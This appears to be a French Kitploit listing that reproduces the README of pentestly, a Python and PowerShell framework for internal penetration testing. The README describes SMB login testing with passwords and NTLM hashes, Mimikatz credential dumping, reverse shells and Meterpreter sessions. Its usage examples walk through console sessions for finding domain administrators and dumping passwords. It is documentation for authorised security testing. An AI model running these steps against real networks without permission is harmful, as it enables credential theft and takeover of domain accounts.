Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
pentestly — Framework interne de test d'intrusion en Python et Powershell | Kitploit
Outils/GitHubGitHub/praetorian-inc/pentestly
Frameworks de Tests d'IntrusionEscalade de PrivilègesReconnaissanceAttaques de Mots de PasseExploitationMouvement LatéralCollecte d'InformationsPost-ExploitationTests d'IntrusionCommandement et ContrôleRed Teaming
72113721il y a 10 ansVérifié par Kitploit
Archived
GitHubpraetorian-inc/pentestly

pentestly

Framework interne de test d'intrusion en Python et Powershell

Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Pentestly

Pentestly est une combinaison d'outils Python évolutifs destinés aux tests de pénétration. L'objectif est d'utiliser une interface utilisateur familière tout en facilitant les contributions au framework grâce à la puissance de Python.

Article de blog : Pentestly Framework : Quand le Pentesting rencontre Python et Powershell

Auteur : @ctfhacker / Cory Duplantis

Démo

asciicast

Fonctionnalités actuelles

  • Importer du XML NMAP
  • Tester l'authentification SMB en utilisant :
    • des identifiants individuels
    • un fichier contenant des identifiants
    • des identifiants nuls
    • un hash NTLM
  • Tester les privilèges d'administrateur local pour une authentification SMB réussie
  • Identifier les partages SMB lisibles pour des identifiants valides
  • Stocker les noms des comptes Administrateur de domaine/Enterprise
  • Déterminer l'emplacement des processus Administrateur de domaine en cours d'exécution
  • Déterminer les systèmes des Administrateurs de domaine connectés
  • Exécuter des commandes Powershell en mémoire et exfiltrer les résultats
  • Exécuter Mimikatz pour récupérer les mots de passe en clair depuis la mémoire (Invoke-Mimikatz.ps1)
  • Recevoir un shell de commande (Powercat)
  • Recevoir une session meterpreter (Invoke-Shellcode.ps1)

Sur les épaules de géants

Pentestly s'appuie sur le travail de géants. Voici les outils actuellement utilisés dans Pentestly :

  • recon-ng - La base de données backend de recon-ng est magnifiquement conçue et exploitée dans Pentestly pour la manipulation des données

  • wmiexec.py - Permet d'exécuter des commandes Powershell rapidement et facilement via WMI

  • smbmap.py - Utilitaire pratique pour énumérer les partages SMB

  • Invoke-Mimikatz.ps1 - Implémentation de Mimikatz en Powershell

  • powercat.ps1 - Fonctionnalité de type Netcat en Powershell

  • Invoke-Shellcode.ps1 - Déploiement de Meterpreter en Powershell

  • CrackMapExec - Source d'inspiration pour le serveur Mimikatz simple dans Pentestly

Installation

git clone https://github.com/praetorian-inc/pentestly.git
./install.sh
./pentestly

Utilisation

Parcourons plusieurs fonctions actuellement implémentées.

Changer d'espace de travail

[pentestly][default] > workspaces list

  +------------+
  | Workspaces |
  +------------+
  | default    |
  +------------+

[pentestly][default] > workspaces add project
[pentestly][project] > workspaces select project

Charger depuis nmap

[pentestly][project][nmap_xml] > load nmap
[pentestly][project][nmap_xml] > set filename /root/PROJECT/full-all-alive.xml
FILENAME => /root/PROJECT/full-all-alive.xml
[pentestly][project][nmap_xml] > show options

  Name      Current Value                      Required  Description
  --------  -------------                      --------  -----------
  FILENAME  /root/PROJECT/full-all-alive.xml  yes       Chemin et nom de fichier pour l'entrée XML nmap

[pentestly][project][nmap_xml] > run

Tester les connexions

Utiliser un fichier avec des identifiants pour tester la connexion

[pentestly][project][login] > cat /tmp/creds
[*] Command: cat /tmp/creds
user1 pass1
user2 pass2
[pentestly][project][login] > load login
[pentestly][project][login] > set userpass_file /tmp/creds
USERPASS_FILE => /tmp/creds
[pentestly][project][login] > set username ''
USERNAME => ''
[pentestly][project][login] > set password ''
PASSWORD => ''
[pentestly][project][login] > run

Utiliser un seul nom d'utilisateur/mot de passe

[pentestly][project][login] > load login
[pentestly][project][login] > set username admin
USERNAME => admin
[pentestly][project][login] > set password password
PASSWORD => password
[pentestly][project][login] > set userpass_file ''
USERPASS_FILE => ''
[pentestly][project][login] > run

Utiliser des identifiants sur un petit sous-ensemble d'IP p. ex. sur le 192.168.8.0/24 trouvé dans la table

[pentestly][project][login] > load login
[pentestly][project][login] > set username admin
USERNAME => admin
[pentestly][project][login] > set password password
PASSWORD => password
[pentestly][project][login] > set userpass_file ''
USERPASS_FILE => ''
[pentestly][project][login] > run
[pentestly][project][login] > set source query select * from pentestly_creds where host like '192.168.8.%'

Récupérer les administrateurs de domaine et d'entreprise

[pentestly][project][login] > load get_domain # Remarque : recherche floue - get_domain trouve get_domain_admin_names
[pentestly][project][get_domain_admin_names] > show options

  Name    Current Value  Required  Description
  ------  -------------  --------  -----------
  SOURCE  default        yes       source d'entrée (voir 'show info' pour plus de détails)

[pentestly][project][get_domain_admin_names] > run
[*] Found Domain Admin: domain\admin1
[*] Found Domain Admin: domain\admin2

Exécuter mimikatz sur des IP avec droits d'exécution

[pentestly][default][get_domain_admin_names] > load mimi
[pentestly][default][mimikatz] > run
Select local interface for hosting scripts

0. 127.0.0.1
1. 10.220.8.94
2. 172.27.67.14
> 1

[*] Execution creds: domain\Admin:[email protected]
[*] Success! Admin.DA:p@$$w0rd  - DOMAIN ADMIN!

Afficher les administrateurs locaux

[pentestly][default][show_local_admins] > load show_local_admins
[pentestly][default][show_local_admins] > run

+---------------------------------------------------------------------------------------------------------------+
|      host      | access |  username  |  password  | domain | process | logged_in | success | execute | module |
+---------------------------------------------------------------------------------------------------------------+
| 10.202.208.112 |        | nsportsman | password1! | zojix  |         |           | True    | True    | login  |
+---------------------------------------------------------------------------------------------------------------+

Afficher les administrateurs de domaine

[pentestly][default][show_domain_admins] > load show_domain_admins
[pentestly][default][show_domain_admins] > run

+--------------------------------------------------------------------------------------------------------------------------+
|      host      | access        | username  |  password       | domain | process | logged_in | success | execute | module |
+--------------------------------------------------------------------------------------------------------------------------+
| 10.202.208.112 | Domain Admin  | TheRealDA | </l33TPassword> | zojix  |         |           | True    | True    | login  |
+--------------------------------------------------------------------------------------------------------------------------+

Enumshares

[pentestly][default] > load enums
[pentestly][default][enumshares] > run
[*] Execution creds: workgroup\Administrator:[email protected]
defaultdict(<type 'list'>, {'readonly': [u'ADMIN$', u'C', u'C$', u'Users'], 'noaccess': [u'IPC$']})

Afficher les nouveaux partages

[pentestly][default][interesting_files] > show pentestly_shares
Télécharger l’outil